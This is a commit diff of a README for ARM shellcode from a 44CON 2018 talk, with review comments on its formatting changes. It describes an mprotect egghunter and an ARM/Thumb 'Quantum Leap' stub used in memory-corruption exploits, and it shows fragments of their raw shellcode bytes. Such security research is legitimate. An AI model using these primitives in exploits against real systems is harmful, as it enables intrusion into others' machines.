Shellcode from my talk at 44CON 2018
therealsaumil committed Sep 18, 2018
1 parent 720f156 commit a8b10c6
Showing 1 changed file with 12 additions and 14 deletions.
26 changes: 12 additions & 14 deletions README.md
@@ -1,13 +1,11 @@
ARM Shellcode
=============
# ARM Shellcode #

1. mprotect egghunter
---------------------
## 1. mprotect egghunter ##

- Searches for an EGG (4+4 byte value) in the memory of the exploited process.
- Uses mprotect() to test the presence of pages in the virtual memory space of the target process.
- mprotect() also marks pages RWX as it scans the virtual memory space.
- Upon finding the pre-defined EGG occuring at consecutive locations, the mprotect egghunter passes on the execution control to the shellcode appended to the eggs.
- Searches for an EGG (4+4 byte value) in the memory of the exploited process.
- Uses mprotect() to test the presence of pages in the virtual memory space of the target process.
- mprotect() also marks pages RWX as it scans the virtual memory space.
- Upon finding the pre-defined EGG occuring at consecutive locations, the mprotect egghunter passes on the execution control to the shellcode appended to the eggs.

RAW SHELLCODE:

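Review bot: the typo in the re-added fourth bullet, `- Upon finding the pre-defined EGG occuring at consecutive locations, ...`, should be corrected to "occurring" while these lines are being touched; the four bullets are otherwise identical to the lines they replace, so this appears to be a line-ending or trailing-whitespace change rather than a content edit, and the commit message could say so. Since the README already states that mprotect() marks pages RWX as it scans, one sentence saying whether those pages are left RWX after the hunt finishes would tell readers what footprint the egghunter leaves in the target process.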
@@ -22,12 +20,11 @@ $mprotect_egghunter = "\x01\x10\x8f\xe2\x11\xff\x2f\xe1" .
"HACK";
```

2. Quantum Leap code
--------------------
## 2. Quantum Leap code ##

- ARM/Thumb Polyglot code.
- Can be started in ARM mode or Thumb mode.
- Irrespective of the mode it is started in, the Quantum Leap code will switch the CPU to Thumb mode and proceed to execute any Thumb shellcode appended to it.
- ARM/Thumb Polyglot code.
- Can be started in ARM mode or Thumb mode.
- Irrespective of the mode it is started in, the Quantum Leap code will switch the CPU to Thumb mode and proceed to execute any Thumb shellcode appended to it.

RAW SHELLCODE:

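Review bot: the three Quantum Leap bullets are re-added byte-for-byte identical to the removed ones, so as in the first hunk this is a whitespace or line-ending change; worth confirming with a whitespace-ignoring diff that nothing else moved. The context in the hunk header, `$mprotect_egghunter = "\x01\x10\x8f\xe2\x11\xff\x2f\xe1" .`, shows the raw shellcode as a concatenated string in PHP/Perl syntax ending in `"HACK";`, but the fence language is not stated in the visible lines and the README never says what the "4+4 byte" EGG actually is; both should be spelled out, since readers will be pasting these bytes into their own harnesses and need to know how the escapes are interpreted and what marker to place before their shellcode.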
@@ -38,6 +35,7 @@ $quantum_leap_stub = "\x19\xa0\x8f\x22\x15\xa0\x8f\x32" .
"\x02\xa0\xbd\x28\x02\xa0\xbd\x38";
```

For more details please browse through my presentation titled "Make ARM Shellcode Great Again" at https://www.slideshare.net/saumilshah/make-arm-shellcode-great-again
For more details please browse through my 44CON 2018 presentation titled "Make ARM Shellcode Great Again" at https://www.slideshare.net/saumilshah/make-arm-shellcode-great-again

@therealsaumil

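Review bot: the rewritten closing line now names the venue ("my 44CON 2018 presentation"), which matches the commit message; the second added line in this hunk is a trailing blank after `@therealsaumil`, which is harmless but whitespace-only and could be left out so the hunk is limited to the wording fix.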